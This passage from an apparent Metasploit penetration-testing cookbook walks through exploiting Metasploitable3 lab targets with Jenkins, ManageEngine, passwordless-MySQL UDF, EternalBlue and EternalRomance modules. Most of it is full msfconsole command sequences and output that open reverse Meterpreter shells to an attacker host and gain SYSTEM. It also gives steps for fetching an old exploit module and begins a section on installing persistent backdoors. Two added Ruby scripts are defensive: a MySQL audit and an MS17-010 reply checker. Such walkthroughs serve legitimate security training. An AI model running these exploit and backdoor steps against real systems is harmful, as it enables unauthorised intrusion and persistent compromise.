  LHOST => 192.168.177.143
  [*] Started reverse TCP handler on 192.168.177.143:4444
  [*] 192.168.177.139:80 - Dumping the username and password hash...
  [+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
  [*] Sending stage (38247 bytes) to 192.168.177.139
  [*] Meterpreter session 14 opened (192.168.177.143:4444 -> 192.168.177.139:51063) at 2019-04-28 16:42:49 +0800
  [!] This exploit may require manual cleanup of 'bgxx.php' on the target
  [!] This exploit may require manual cleanup of '/var/content/module/glt/bgxx.php' on the target
  meterpreter >
  [+] 192.168.177.139:80 - Deleted bgxx.php
  meterpreter > getuid
  Server username: Administrator (0)
  meterpreter > sysinfo
  Computer    : WIN-BGKRU85VR4H
  OS          : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
  Meterpreter : php/windows
  meterpreter >

4. Exploiting a Windows server

Using the information collected earlier, we will target a Windows server for exploitation. In this section we will use Metasploitable3 as the target machine.

Getting ready

Using the collected information, look up vulnerabilities and choose a suitable exploit module.

Use services to see the target's Apache service version.

  msf5 > services -p 8020 192.168.177.144
  Services
  ========
  host             port  proto  name  state  info
  ----             ----  -----  ----  -----  ----
  192.168.177.144  8020  tcp    http  open   Apache httpd
  msf5 >

Browse to the target site

Browsing the target site, we can try to log in with a weak password, such as admin

And we're in.

How to do it...

1. Look at the Jenkins-CI service running on port 8484.

  msf5 > services 192.168.177.144 -p 8484
  Services
  ========
  host             port  proto  name  state  info
  ----             ----  -----  ----  -----  ----
  192.168.177.144  8484  tcp    http  open   Jetty winstone-2.8

Jenkins is not shown here, so let's have a look in the browser

It is indeed a Jenkins service

We use search jenkins to find usable modules

  msf5 > search jenkins
  Matching Modules
  ================
  #  Name  Disclosure Date  Rank  Check  Description
  -  ----  ---------------  ----  -----  -----------
  1   auxiliary/gather/jenkins_cred_recovery  normal  Yes  Jenkins Domain Credential Recovery
  2   auxiliary/scanner/http/jenkins_command  normal  Yes  Jenkins-CI Unauthenticated Script-Console Scanner
  3   auxiliary/scanner/http/jenkins_enum  normal  Yes  Jenkins-CI Enumeration
  4   auxiliary/scanner/http/jenkins_login  normal  Yes  Jenkins-CI Login Utility
  5   auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum  normal  No  Jenkins Server Broadcast Enumeration
  6   exploit/linux/misc/jenkins_java_deserialize  2015-11-18  excellent  Yes  Jenkins CLI RMI Java Deserialization Vulnerability
  7   exploit/linux/misc/jenkins_ldap_deserialize  2016-11-16  excellent  Yes  Jenkins CLI HTTP Java Deserialization Vulnerability
  8   exploit/linux/misc/opennms_java_serialize  2015-11-06  normal  No  OpenNMS Java Object Unserialization Remote Code Execution
  9   exploit/multi/http/jenkins_metaprogramming  2019-01-08  excellent  Yes  Jenkins ACL Bypass and Metaprogramming RCE
  10  exploit/multi/http/jenkins_script_console  2013-01-18  good  Yes  Jenkins-CI Script-Console Java Execution
  11  exploit/multi/http/jenkins_xstream_deserialize  2016-02-24  excellent  Yes  Jenkins XStream Groovy classpath Deserialization Vulnerability
  12  exploit/windows/misc/ibm_websphere_java_deserialize  2015-11-06  excellent  No  IBM WebSphere RCE Java Deserialization Vulnerability
  13  post/multi/gather/jenkins_gather  normal  No  Jenkins Credential Collector
  msf5 >

Use the Jenkins-CI Script-Console Java Execution module

  msf5 > use exploit/multi/http/jenkins_script_console
  msf5 exploit(multi/http/jenkins_script_console) > set RHOSTS 192.168.177.144
  RHOSTS => 192.168.177.144
  msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8484
  RPORT => 8484
  msf5 exploit(multi/http/jenkins_script_console) > set TARGETURI /
  TARGETURI => /
  msf5 exploit(multi/http/jenkins_script_console) > exploit
  [*] Started reverse TCP handler on 192.168.177.143:4444
  [*] Checking access to the script console
  [*] No authentication required, skipping login...
  [*] 192.168.177.144:8484 - Sending command stager...
  [*] Command Stager progress - 2.06% done (2048/99626 bytes)
  [*] Command Stager progress - 4.11% done (4096/99626 bytes)
  [*] Command Stager progress - 6.17% done (6144/99626 bytes)
  ....
  [*] Command Stager progress - 98.67% done (98304/99626 bytes)
  [*] Command Stager progress - 100.00% done (99626/99626 bytes)
  [*] Sending stage (179779 bytes) to 192.168.177.144
  [*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:49555) at 2019-04-26 17:32:58 +0800
  meterpreter > sysinfo
  Computer        : METASPLOITABLE3
  OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter > getuid
  Server username: NT AUTHORITY\LOCAL SERVICE
  meterpreter >

Exploiting ManageEngine Desktop Central 9

  msf5 exploit(multi/http/jenkins_script_console) > search type:exploit Manageengine
  Matching Modules
  ================
  #  Name  Disclosure Date  Rank  Check  Description
  -  ----  ---------------  ----  -----  -----------
  1   exploit/multi/http/eventlog_file_upload  2014-08-31  excellent  Yes  ManageEngine Eventlog Analyzer Arbitrary File Upload
  2   exploit/multi/http/manage_engine_dc_pmp_sqli  2014-06-08  excellent  Yes  ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
  3   exploit/multi/http/manageengine_auth_upload  2014-12-15  excellent  Yes  ManageEngine Multiple Products Authenticated File Upload
  4   exploit/multi/http/manageengine_sd_uploader  2015-08-20  excellent  Yes  ManageEngine ServiceDesk Plus Arbitrary File Upload
  5   exploit/multi/http/manageengine_search_sqli  2012-10-18  excellent  Yes  ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection
  6   exploit/multi/http/opmanager_socialit_file_upload  2014-09-27  excellent  Yes  ManageEngine OpManager and Social IT Arbitrary File Upload
  7   exploit/windows/http/desktopcentral_file_upload  2013-11-11  excellent  Yes  ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload
  8   exploit/windows/http/desktopcentral_statusupdate_upload  2014-08-31  excellent  Yes  ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
  9   exploit/windows/http/manage_engine_opmanager_rce  2015-09-14  manual  Yes  ManageEngine OpManager Remote Code Execution
  10  exploit/windows/http/manageengine_adshacluster_rce  2018-06-28  excellent  Yes  Manage Engine Exchange Reporter Plus Unauthenticated RCE
  11  exploit/windows/http/manageengine_appmanager_exec  2018-03-07  excellent  Yes  ManageEngine Applications Manager Remote Code Execution
  12  exploit/windows/http/manageengine_apps_mngr  2011-04-08  average  No  ManageEngine Applications Manager Authenticated Code Execution
  13  exploit/windows/http/manageengine_connectionid_write  2015-12-14  excellent  Yes  ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
  14  exploit/windows/misc/manageengine_eventlog_analyzer_rce  2015-07-11  manual  Yes  ManageEngine EventLog Analyzer Remote Code Execution
  msf5 exploit(multi/http/jenkins_script_console) >

  msf5 exploit(multi/http/jenkins_script_console) > use exploit/windows/http/manageengine_connectionid_write
  msf5 exploit(windows/http/manageengine_connectionid_write) > set PAYLOAD windows/meterpreter/reverse_http
  PAYLOAD => windows/meterpreter/reverse_http
  msf5 exploit(windows/http/manageengine_connectionid_write) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
  [-] Exploit failed: The following options failed to validate: RHOSTS.
  [*] Exploit completed, but no session was created.
  msf5 exploit(windows/http/manageengine_connectionid_write) > set RHOSTS 192.168.177.144
  RHOSTS => 192.168.177.144
  msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
  [*] Started HTTP reverse handler on http://192.168.177.143:8080
  [*] Creating JSP stager
  [*] Uploading JSP stager uBzAP.jsp...
  [*] Executing stager...
  [*] http://192.168.177.143:8080 handling request from 192.168.177.144; (UUID: tsqgh8zb) Staging x86 payload (180825 bytes) ...
  [*] Meterpreter session 3 opened (192.168.177.143:8080 -> 192.168.177.144:49632) at 2019-04-26 17:39:09 +0800
  [!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/uBzAP.jsp' on the target
  meterpreter >
  meterpreter > getuid
  Server username: NT AUTHORITY\LOCAL SERVICE
  meterpreter > sysinfo
  Computer        : METASPLOITABLE3
  OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  meterpreter >

5. Exploiting common services

Some services are tied to most of the other services running on a target, and yet they are the ones most often overlooked during exploitation.

Getting ready

In this recipe we exploit one of the most common and most abused services found in target environments: MySQL. It is so often exploitable because instances get installed for development purposes and are never hardened, not even to the point of setting a root password at all, let alone a strong one.

The target throughout this recipe is Metasploitable3.

How to do it

To exploit the target's MySQL service we first enumerate it with the MySQL enumeration auxiliary module, then use the Oracle MySQL for Microsoft Windows Payload Execution exploit module to obtain a shell on the remote host.

TIP: If your Metasploit build lacks the mysql_payload module (the msf5 build used here did; run "search mysql_payload" to confirm before downloading anything), fetch it from https://www.exploit-db.com/download/16957, drop it into the matching module directory (/usr/share/metasploit-framework/modules/exploits/windows/mysql) and adjust the first lines of the file as shown below. The Exploit-DB copy dates from 2011 and declares "class Metasploit3"; frameworks since 4.12 only load modules whose class is named MetasploitModule, which is the one change that actually matters.

  ##
  # $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $
  ##
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  require 'msf/core'                      # left over from the 2011 file; harmless, newer modules omit it
  class MetasploitModule < Msf::Exploit::Remote   # the Exploit-DB copy says "class Metasploit3"; rename it
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::MYSQL     # MySQL client mixin: login, queries, FILE-privilege checks
  include Msf::Exploit::CmdStager         # delivers the payload in chunks through sys_exec()

Enumeration:

  msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/admin/mysql/mysql_enum
  msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.177.144
  RHOSTS => 192.168.177.144
  msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
  USERNAME => root
  msf5 auxiliary(admin/mysql/mysql_enum) > run
  [*] Running module against 192.168.177.144
  [*] 192.168.177.144:3306 - Running MySQL Enumerator...
  [*] 192.168.177.144:3306 - Enumerating Parameters
  [*] 192.168.177.144:3306 - MySQL Version: 5.5.20-log
  [*] 192.168.177.144:3306 - Compiled for the following OS: Win64
  [*] 192.168.177.144:3306 - Architecture: x86
  [*] 192.168.177.144:3306 - Server Hostname: metasploitable3
  [*] 192.168.177.144:3306 - Data Directory: c:\wamp\bin\mysql\mysql5.5.20\data\
  [*] 192.168.177.144:3306 - Logging of queries and logins: OFF
  [*] 192.168.177.144:3306 - Old Password Hashing Algorithm OFF
  [*] 192.168.177.144:3306 - Loading of local files: ON
  [*] 192.168.177.144:3306 - Deny logins with old Pre-4.1 Passwords: OFF
  [*] 192.168.177.144:3306 - Allow Use of symlinks for Database Files: YES
  [*] 192.168.177.144:3306 - Allow Table Merge:
  [*] 192.168.177.144:3306 - SSL Connection: DISABLED
  [*] 192.168.177.144:3306 - Enumerating Accounts:
  [*] 192.168.177.144:3306 - List of Accounts with Password Hashes:
  [+] 192.168.177.144:3306 - User: root Host: localhost Password Hash:
  [+] 192.168.177.144:3306 - User: root Host: 127.0.0.1 Password Hash:
  [+] 192.168.177.144:3306 - User: root Host: ::1 Password Hash:
  [+] 192.168.177.144:3306 - User: Host: localhost Password Hash:
  [+] 192.168.177.144:3306 - User: root Host: % Password Hash:
  [*] 192.168.177.144:3306 - The following users have GRANT Privilege:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - The following users have CREATE USER Privilege:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] 192.168.177.144:3306 - The following users have RELOAD Privilege:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] 192.168.177.144:3306 - The following users have SHUTDOWN Privilege:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] 192.168.177.144:3306 - The following users have SUPER Privilege:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] 192.168.177.144:3306 - The following users have FILE Privilege:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] 192.168.177.144:3306 - The following users have PROCESS Privilege:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] 192.168.177.144:3306 - The following accounts have privileges to the mysql database:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] 192.168.177.144:3306 - Anonymous Accounts are Present:
  [*] 192.168.177.144:3306 - User: Host: localhost
  [*] 192.168.177.144:3306 - The following accounts have empty passwords:
  [*] 192.168.177.144:3306 - User: root Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: 127.0.0.1
  [*] 192.168.177.144:3306 - User: root Host: ::1
  [*] 192.168.177.144:3306 - User: Host: localhost
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] 192.168.177.144:3306 - The following accounts are not restricted by source:
  [*] 192.168.177.144:3306 - User: root Host: %
  [*] Auxiliary module execution completed
  msf5 auxiliary(admin/mysql/mysql_enum) >

Exploitation:

  msf5> use exploit/windows/mysql/mysql_payload
  msf5 exploit(windows/mysql/mysql_payload) > show options
  msf5 exploit(windows/mysql/mysql_payload) > set RHOSTS 192.168.177.144
  RHOSTS => 192.168.177.144
  msf5 exploit(windows/mysql/mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/mysql/mysql_payload) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 exploit(windows/mysql/mysql_payload) > set LPORT 4444
  LPORT => 4444
  msf5 exploit(windows/mysql/mysql_payload) > exploit
  [*] Started reverse TCP handler on 192.168.177.143:4444
  [*] 192.168.177.144:3306 - Checking target architecture...
  [*] 192.168.177.144:3306 - Checking for sys_exec()...
  [*] 192.168.177.144:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
  [*] 192.168.177.144:3306 - Command Stager progress - 1.47% done (1499/102246 bytes)
  [*] 192.168.177.144:3306 - Command Stager progress - 2.93% done (2998/102246 bytes)
  [*] 192.168.177.144:3306 - Command Stager progress - 4.40% done (4497/102246 bytes)
  [*] 192.168.177.144:3306 - Command Stager progress - 5.86% done (5996/102246 bytes)
  ......
  [*] Sending stage (179779 bytes) to 192.168.177.144
  [*] 192.168.177.144:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
  [*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:55358) at 2019-04-26 16:25:45 +0800
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter >

Because the target's MySQL accepts root with no password, the database service alone is enough for code execution: the module logs in, looks for the sys_exec() UDF (uploading its own UDF library when it is missing, which requires the FILE privilege and a writable plugin directory), and streams the payload through sys_exec() with the command stager. The shell runs as the account the MySQL service runs under, here NT AUTHORITY\SYSTEM. So never skip the basic services during a test, even when you think nobody would be careless enough to leave one running without a password.
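The conditions mysql_enum reported above (empty root passwords, an anonymous account, root reachable from any host, the FILE privilege with no secure_file_priv restriction, local file loading on) are exactly what makes the UDF route work. The following Ruby is an added example, not code from the book or from Metasploit: it scores rows shaped like the mysql.user table and emits the MySQL 5.5 remediation statement for each finding. The rows, the variable values and the my.ini path C:\mysql-files\ are constructed to mirror the enumeration output above.

```ruby
# Added example: audit rules for the MySQL weaknesses enumerated above, with the
# MySQL 5.5 remediation for each. Not part of the book or of Metasploit.
Account = Struct.new(:user, :host, :password, :file_priv, :super_priv)
Finding = Struct.new(:subject, :issue, :fix)

# Constructed rows mirroring the mysql.user table of the target shown above
# (an empty Password column means the account logs in without a password).
SAMPLE_ACCOUNTS = [
  Account.new('root', 'localhost', '', 'Y', 'Y'),
  Account.new('root', '127.0.0.1', '', 'Y', 'Y'),
  Account.new('root', '::1',       '', 'Y', 'Y'),
  Account.new('',     'localhost', '', 'N', 'N'),   # anonymous account
  Account.new('root', '%',         '', 'Y', 'Y'),   # reachable from any source host
].freeze

# Constructed server variables, as SHOW VARIABLES would report them
SAMPLE_VARS = { 'secure_file_priv' => '', 'local_infile' => 'ON' }.freeze

def ident(a)
  "'#{a.user}'@'#{a.host}'"
end

def audit_accounts(accounts)
  accounts.flat_map do |a|
    who = ident(a)
    next [Finding.new(who, 'anonymous account', "DROP USER #{who};")] if a.user.empty?

    out = []
    if a.password.empty?
      # MySQL 5.5 syntax; from 5.7.6 use ALTER USER ... IDENTIFIED BY '...'
      out << Finding.new(who, 'empty password',
                         "SET PASSWORD FOR #{who} = PASSWORD('<new strong password>');")
    end
    if a.host == '%' && a.super_priv == 'Y'
      out << Finding.new(who, 'SUPER account not restricted by source host', "DROP USER #{who};")
    end
    out
  end
end

def audit_variables(vars, accounts)
  out = []
  file_users = accounts.reject { |a| a.user.empty? }.select { |a| a.file_priv == 'Y' }
  if vars['secure_file_priv'].to_s.empty? && !file_users.empty?
    # With an unrestricted secure_file_priv, SELECT ... INTO DUMPFILE can write a UDF
    # library into plugin_dir, which is exactly how mysql_payload obtains sys_exec().
    out << Finding.new(file_users.map { |a| ident(a) }.uniq.join(', '),
                       'FILE privilege with unrestricted secure_file_priv (UDF upload possible)',
                       'my.ini [mysqld]: secure-file-priv=C:\\mysql-files\\  (a directory other than plugin_dir)')
  end
  if vars['local_infile'] == 'ON'
    out << Finding.new('server', 'LOAD DATA LOCAL INFILE enabled', 'my.ini [mysqld]: local-infile=0')
  end
  out
end

def audit(accounts, vars)
  audit_accounts(accounts) + audit_variables(vars, accounts)
end

if __FILE__ == $0
  audit(SAMPLE_ACCOUNTS, SAMPLE_VARS).each do |f|
    puts "[#{f.subject}] #{f.issue}"
    puts "    fix: #{f.fix}"
  end
end
```

Feed it the rows of "SELECT user, host, password, File_priv, Super_priv FROM mysql.user" and the two variables from SHOW VARIABLES; on the target above it produces eight findings. Note that the anonymous account is reported once and dropped outright rather than given a password.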

6. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Reusing what we gathered in the information gathering and scanning phase, in particular the output of the MS17-010 SMB RCE detection auxiliary module, we can move on to the next vulnerable service.

Getting ready

The MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit module is a port of the Equation Group's ETERNALBLUE exploit, part of the FuzzBunch toolkit that the Shadow Brokers obtained and published in 2017 and that is widely attributed to the NSA. The bug is in srv.sys: SrvOs2FeaListSizeToNt miscalculates the size of a file extended attribute (FEA) list while converting it from the OS/2 to the NT format, so the subsequent copy writes past the end of the non-paged pool allocation. The exploit grooms the pool so that the overwrite lands on an adjacent SMBv2 buffer and turns that into arbitrary kernel code execution, which the module uses to run its payload as SYSTEM. After the leak the exploit was used by the WannaCry ransomware. It affects every Windows client and server that exposes SMBv1 without the MS17-010 update. The msf5 module used here supports only 64-bit Windows 7 and Server 2008 R2 targets, so an x64 payload must be set, and a failed attempt can crash the target because it is corrupting kernel memory, so run the detection module first.
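Before firing the exploit, the detection module mentioned above settles whether the target is still unpatched, and it does so without corrupting anything: it sends an SMB_COM_TRANSACTION request with the PeekNamedPipe subcommand over IPC$, and an unpatched srv.sys answers with NT status STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), while a patched host returns STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE. The Ruby below is an added example, not code from the book or from Metasploit: it parses the NetBIOS-framed SMB1 header of such a reply and classifies it. The reply bytes are constructed; every field other than the command and the status is an arbitrary sample value.

```ruby
# Added example: the reply classification behind the MS17-010 check. Not part of
# the book or of Metasploit; the sample replies are constructed, not captured.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched SMBv1 answers PeekNamedPipe with this
STATUS_ACCESS_DENIED           = 0xC0000022
STATUS_INVALID_HANDLE          = 0xC0000008
SMB_COM_TRANSACTION            = 0x25
SMB_MAGIC                      = "\xFFSMB".b

SmbHeader = Struct.new(:command, :nt_status, :flags, :flags2, :tid, :pid, :uid, :mid)

# Parse a NetBIOS-session-wrapped SMB1 message: 4-byte NBSS header, then the
# 32-byte SMB header. Only the header is needed for the verdict.
def parse_smb1(bytes)
  raise ArgumentError, 'short packet' if bytes.bytesize < 36
  nbss_len = bytes.unpack1('N') & 0x1FFFF       # low 17 bits of the NBSS header = payload length
  raise ArgumentError, 'NBSS length mismatch' if nbss_len != bytes.bytesize - 4
  hdr = bytes.byteslice(4, 32)
  raise ArgumentError, 'not SMB1' unless hdr.byteslice(0, 4) == SMB_MAGIC
  # protocol(4) command(1) status(4 LE) flags(1) flags2(2) pid_high(2) signature(8)
  # reserved(2) tid(2) pid(2) uid(2) mid(2)
  command, status, flags, flags2, _pid_high, _sig, _rsv, tid, pid, uid, mid =
    hdr.unpack('x4 C V C v v a8 v v v v v')
  SmbHeader.new(command, status, flags, flags2, tid, pid, uid, mid)
end

def classify_ms17_010(reply)
  hdr = parse_smb1(reply)
  return :unexpected_reply unless hdr.command == SMB_COM_TRANSACTION
  case hdr.nt_status
  when STATUS_INSUFF_SERVER_RESOURCES then :vulnerable          # MS17-010 missing
  when STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE then :patched_or_hardened
  else :unknown
  end
end

# Build a reply with the given status for testing. Flags 0x98 marks a server
# reply; the tid/pid/uid/mid values are arbitrary sample values.
def build_smb1_reply(status, command: SMB_COM_TRANSACTION)
  hdr = SMB_MAGIC + [command, status, 0x98, 0xC807, 0, "\0" * 8, 0, 0x0800, 0xFEFF, 0x0800, 0x40]
                    .pack('C V C v v a8 v v v v v')
  [hdr.bytesize].pack('N') + hdr                # NBSS: type 0x00 + length (here well below 0x1FFFF)
end

if __FILE__ == $0
  { 'unpatched' => STATUS_INSUFF_SERVER_RESOURCES, 'patched' => STATUS_ACCESS_DENIED }.each do |name, st|
    puts "#{name}: #{classify_ms17_010(build_smb1_reply(st))}"
  end
end
```

Only the NT status of the Transaction reply matters for the verdict; the parser still validates the NBSS length and the SMB magic so that a truncated or SMB2 reply is reported as an error instead of a false negative.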

How to do it

Load the ms17_010_eternalblue module, set the target IP address and the payload, then run the exploit:

  msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.177.144
  RHOSTS => 192.168.177.144
  msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
  PAYLOAD => windows/x64/meterpreter/reverse_tcp
  msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
  msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
  [*] Started reverse TCP handler on 192.168.177.143:4444
  [*] 192.168.177.144:445 - Connecting to target for exploitation.
  [+] 192.168.177.144:445 - Connection established for exploitation.
  [+] 192.168.177.144:445 - Target OS selected valid for OS indicated by SMB reply
  [*] 192.168.177.144:445 - CORE raw buffer dump (51 bytes)
  [*] 192.168.177.144:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
  [*] 192.168.177.144:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
  [*] 192.168.177.144:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
  [*] 192.168.177.144:445 - 0x00000030 6b 20 31 k 1
  [+] 192.168.177.144:445 - Target arch selected valid for arch indicated by DCE/RPC reply
  [*] 192.168.177.144:445 - Trying exploit with 12 Groom Allocations.
  [*] 192.168.177.144:445 - Sending all but last fragment of exploit packet
  [*] 192.168.177.144:445 - Starting non-paged pool grooming
  [+] 192.168.177.144:445 - Sending SMBv2 buffers
  [+] 192.168.177.144:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  [*] 192.168.177.144:445 - Sending final SMBv2 buffers.
  [*] 192.168.177.144:445 - Sending last fragment of exploit packet!
  [*] 192.168.177.144:445 - Receiving response from exploit packet
  [+] 192.168.177.144:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
  [*] 192.168.177.144:445 - Sending egg to corrupted connection.
  [*] 192.168.177.144:445 - Triggering free of corrupted buffer.
  [*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:49655) at 2019-04-26 17:40:54 +0800
  [+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  [+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  [+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  meterpreter >
  meterpreter > sysinfo
  Computer : METASPLOITABLE3
  OS : Windows 2008 R2 (Build 7601, Service Pack 1).
  Architecture : x64
  System Language : en_US
  Domain : WORKGROUP
  Logged On Users : 2
  Meterpreter : x64/windows
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter >

7. MS17-010 EternalRomance/EternalSynergy/EternalChampion

The MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution exploit module is another way to exploit MS17-010. Instead of corrupting the kernel pool it builds a write-what-where primitive from a type confusion between Transaction and WriteAndX requests, overwrites the connection's session information so that it is treated as an administrator session, and then runs the ordinary psexec payload path. That chain is more reliable than EternalBlue, but it needs a named pipe it can open on the target: by default the module tries a list of well-known pipes over an anonymous session (the NAMED_PIPES option), and if null sessions are blocked you supply credentials with SMBUser and SMBPass. The payload is executed through a service, so an x86 meterpreter works fine on this x64 host, as the output shows.

How to do it

Use the ms17_010_psexec module:

  msf5 > use exploit/windows/smb/ms17_010_psexec
  msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.177.144
  RHOSTS => 192.168.177.144
  msf5 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.177.143
  LHOST => 192.168.177.143
  msf5 exploit(windows/smb/ms17_010_psexec) > exploit
  [*] Started reverse TCP handler on 192.168.177.143:4444
  [*] 192.168.177.144:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
  [*] 192.168.177.144:445 - Built a write-what-where primitive...
  [+] 192.168.177.144:445 - Overwrite complete... SYSTEM session obtained!
  [*] 192.168.177.144:445 - Selecting PowerShell target
  [*] 192.168.177.144:445 - Executing the payload...
  [+] 192.168.177.144:445 - Service start timed out, OK if running a command or non-service executable...
  [*] Sending stage (179779 bytes) to 192.168.177.144
  [*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:62432) at 2019-04-28 09:37:48 +0800
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer : METASPLOITABLE3
  OS : Windows 2008 R2 (Build 7601, Service Pack 1).
  Architecture : x64
  System Language : en_US
  Domain : WORKGROUP
  Logged On Users : 2
  Meterpreter : x86/windows
  meterpreter >

8. Installing backdoors

Once we have a shell, keeping persistent access to the target means installing a backdoor.

Getting ready

The previous exploits gave us a session on the target; we use that meterpreter session to install a backdoored service binary, taking httpd.exe as the example.

  meterpreter > ps -S httpd.exe
  Filtering on 'httpd.exe'
  Process List
  ============
  PID PPID Name Arch Session User Path
  --- ---- ---- ---- ------- ---- ----
  1304 1816 dcserverhttpd.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe
  1816 472 dcserverhttpd.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe
  3180 472 httpd.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe
  3880 3180 httpd.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe
  meterpreter >

Next, we install a backdoor that starts with the system, using the Windows registry persistence module.

Finally, we create a fileless backdoor with a WMI (Windows Management Instrumentation) event subscription.

How to do it

1. Windows keeps the image file of a running process locked, so the backdoored binary cannot be put in place while the program runs; kill the process first.

